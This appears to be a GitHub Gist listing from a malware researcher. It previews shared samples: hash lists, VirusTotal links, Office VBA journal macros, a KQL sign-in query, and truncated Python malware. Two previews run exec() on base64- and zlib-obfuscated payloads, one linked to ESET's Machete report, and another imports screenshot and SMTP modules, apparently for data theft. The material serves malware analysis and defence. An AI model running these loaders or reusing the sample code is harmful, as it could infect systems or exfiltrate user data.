JohnLaTwC

013e5aea77c2b5369872914cbab59a339ab2287a8af0d15d5f0438397123cf5a
013e5aea77c2b5369872914cbab59a339ab2287a8af0d15d5f0438397123cf5a
031b486981fb8797ae204b3ff84c9c9d4dc82082f9857d320d3c553f8f61fc6a
03d535fb04befb425012794b21584d092ac655a9a16bbd0c71367e8b6ce24725
0672a2b0f1ae39ef2610d912db864211b182aad0d42d42e0956feb51594674c1
0b1179198541ae23397ebde9399ba82b29393e939598bd019365b5421ceed56d
0fbb1529ff8f83aafca855c0d72f90b0bac25640d15d46176d0a95570556cacb
1491c687c999a072b5668d03b68332c9057d5ca774c13e4a64c52760e3222f43
16474e032c5d2009684edfd1b5e1f10c8b02cd55c119efb74f9e6f89d9e47992
18698c5a6ff96d21e7ca634a608f01a414ef6fbbd7c1b3bf0f2085c85374516e

JohnLaTwC

## Uploaded by @JohnLaTwC
## sample hash 7257da9496e127b899ce8bc6f72bff7a4ac478060ae1283f35eb1a20a5d977de 
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - 
Sub Calculate_Bonus()
'
' Calculate_Bonus Macro
'
'  Calculate USAA Bounus
'
    Dim fs As Object

JohnLaTwC

' Author: @JohnLaTwC
' You can recreate Journal for PPT files by the following. This will create journal entries every time you open a PPT file.

' STEPS:
' Create a presentation. Insert a Class named clsEvent with the following code:

Public WithEvents PPTEvent As Application
Private Sub PPTEvent_AfterPresentationOpen(ByVal Pres As Presentation)
    RecordJournalEntry (ActivePresentation.Name)
End Sub

JohnLaTwC

' Inspired from https://www.slipstick.com/outlook/journal/create-journal-entry-word-documents-outlook-2013/
' and https://www.msoutlook.info/question/432
' By: @JohnLaTwC (1/3/2020)
Sub RecordJournalEntry(fName)
    Const olJournalItem = 4

    Dim ol
    Set ol = CreateObject("Outlook.Application")
    Dim oJournal
    Set oJournal = ol.CreateItem(olJournalItem)

JohnLaTwC

' Inspired from https://www.slipstick.com/outlook/journal/create-journal-entry-word-documents-outlook-2013/
' By: @JohnLaTwC (1/3/2020)
Sub RecordJournalEntry(fName)
    Const olJournalItem = 4
    Const olByReference = 4
    Dim ol
    Set ol = CreateObject("Outlook.Application")
    Dim oJournal
    Set oJournal = ol.CreateItem(olJournalItem)

JohnLaTwC

## Sample hash: aaab2536650f72314d9670e1fa75dad6f54ed0cbeb8c0182009c8cdb31cb3d97
## link: https://www.virustotal.com/gui/file/aaab2536650f72314d9670e1fa75dad6f54ed0cbeb8c0182009c8cdb31cb3d97/detection
## uploaded by @JohnLaTwC


## Embedded file name: Chrome.py
try:
    import subprocess
    from encodings import hex_codec
    import re, urllib2, os

JohnLaTwC

SigninLogs
| where TimeGenerated >= ago(1d)
| where ResultType == 0 
| extend longitude = todouble(LocationDetails['geoCoordinates']['longitude']),
         latitude = todouble(LocationDetails['geoCoordinates']['latitude']) 
| where geo_point_in_polygon(longitude, latitude, 
    dynamic({"type":"Polygon","coordinates": [[ 
    [ -122.164216, 47.711740], 
    [ -122.084565, 47.714050], 
    [ -122.077698, 47.627585], 

JohnLaTwC

##############################
## uploaded by @JohnLaTwc
## b454179c13cb4727ae06cc9cd126c3379e2aded5c293af0234ac3312bf9bdad2
import zlib, base64
exec(zlib.decompress(base64.b64decode('eJwllrXSxoCNRfs8xXZJxjsxU2lmZndmZv6efv/MtlIhGF2d203rsp//8xu7/H/z7KgI7B/VWxX/+m/gP2VVLNO6V8fxr//P/ScnsP8Gy+pf/6zUZxz3wnqNxnVlk25zjWSwqC8xgasOYCzp2asAAIzn00FOk+HJ1d2JJcWnuQRBFPHrrab1I2Tt7MY64rNBagVVKEZ838hI8axBEiQrIHhsbMWPqK5ff4PragcRKfzNwtEBniSrsDqDStAlIH8KfageEtvAmWrcXGyPDc8Hvyk9Xt0Q9Kro8fWgTUeeFhYv20hgWe1p7ZWftxGDsH7gSDb/Bk31uiDcLWBUsJh7ABuIRyE7xTKnJMqRIiF3foZXs6317IYDI0b7nNPgcRZCnw4wiuNo7XmUlkvhMCuGEe9fzc8Pfg0NNVbZM+dMjmWYU5e8CFBMe3bsuveZLV2TQAfcPhatJpnxo0fnrxgWpCg4SMomsM3Tsj/bD6eSgacAMBlnD3y4+5v6R5rGdq9T8d6y9WN4r5wZTD4ODA4ZNKc4Ik8exWcuH5CwlVVRB/nuAiaZM/czrUTKzejV0yngbtZBW1bQjaCJ8qJZ+q3nyxaMESPJ8giDUxYJCloy20OOaTqdOXbX/Jtz1mO1mQXSBHa5qJV52QxtfyeFVoxn3I4sK1QSzDbrBdCL84H5c0LeddD7qoV03BNdysnXLhDkK9B+qhOMbuOTBCxbUMaHo0b6iIwIgz+5pXWQKQyYISmoGiYp6RWlUCkvzkjGBDFiK3fDpya8ngK0L909I0MP3KtsBuTDZRQsJZt4TebesdaTkjF83GDBpfdbj+4lGL/je0gjU6EQ

JohnLaTwC

## uploaded by @JohnLaTwc
## See paper by ESET @ https://www.welivesecurity.com/wp-content/uploads/2019/08/ESET_Machete.pdf
## b67256906d976aafb6071d23d1b3f59a1696f26b25ff4713b9342d41e656dfba
import zlib, base64
exec(zlib.decompress(base64.b64decode('eJy9WOtvm0gQ/+6/AlmywI8lgG1MLPEhau6BlB7V5U7Vqa4sbK/tbTGLgCRu//qbWV67vjQNlXoksbPs7Mzsb+e57JTyrNCOUX6M2abHyiHP6//y40PB4nr0xJKpE6WsHhfsRHv7jJ+0XVRQHGnVTD3usb3mzog7WzLbZgHD314YWtyvKcyHYpvwJ2No5kW2xzeGPviHDE5ksCOD39eDt+vBvTnY68MPSzL9iAw9m3j2EjjZgT0GZvAzYPgM8BXhHF6ElmVxJJ6RGZAGgS2EB/YVqsBwCH92r8i+LHsat0IOP7DI57l5oAVNHg39Lnxzc3fz7t3tzV83+rCnBbAF32hpx/3V6i3bZjzn+2K1us14uuHn1epNBnCm0W616sMqUEZmKvEL+cvSWInZK6VGj1ERZetttD3SUjLu3iMzbwmA8KswBGBCfhWUTIMrBARwwWGPnrc0LQCJNMpzsXI6I1M4NQFycAVyuVDAAkVM+OQI8TjkFqINIx6aoDCwshkJAsHBtiwCf3jyuAmE3GYm0JOaK34N2uMilYq9Hd1r8G0k0RBUQmXxsG1EK+UpTQy9iPLPMcsL7epRH5oZjXalAbEUv9OYFYa+ShDGPc8AaNAQHo0lWhYlB2rEwKThO0QpqHESIUXz/kO97iPOaxktHrJnp3vV3IePYuOOQxxnqWJTQjKzycz+LyCjIBhI/gGE63USneh67fv6en2KWLJe60vBYjEjC7DoCusRMi5tGCc9h3gguXQJnNK4UAP15L4O2GWRS

JohnLaTwC

## uploaded by @JohnLaTwC
## passwords removed. original sample: https://www.virustotal.com/gui/file/79115bb09fb8f17d9182d8b5f6f7a617ad3cd3d5eafb75b652a71d987cbb783e/details
# -*- coding: utf-8 -*-


from __future__ import unicode_literals
import urllib
from mss import mss
import smtplib 
import datetime